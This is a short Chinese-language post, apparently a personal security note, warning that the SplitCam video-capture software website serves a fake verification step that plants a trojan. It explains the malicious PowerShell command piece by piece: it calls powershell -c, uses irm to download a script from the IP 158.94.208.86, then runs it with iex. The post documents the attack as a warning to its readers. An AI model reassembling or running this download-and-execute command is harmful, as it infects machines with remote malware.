2026.4.3 记录Splitcam网站木马病毒

SplitCam是一款免费的视频捕捉软件，但实测网站被种植了木马病毒：

千万不要执行上面的验证，是虚假的。

这条命令的运作逻辑可以拆解为三个步骤：

1. 启动 PowerShell
   • powershell -c：这是在 CMD 环境中调用 PowerShell 解释器，并执行后面紧跟的命令（-c 是 -Command 的缩写）。
2. 下载恶意脚本
   • irm 158.94.208.86 ...：irm 是 Invoke-RestMethod 的缩写。它的作用是向 IP 地址 158.94.208.86 发送请求，并下载该地址提供的文本内容（通常是一段恶意的 PowerShell 脚本）。
   • -UseBasicParsing：这是一个解析参数，用于加快下载速度并绕过某些网页结构的检查。
3. 立即执行病毒
   • iex(...)：iex 是 Invoke-Expression 的缩写。它会将上一步下载下来的字符串内容直接作为代码在系统中运行。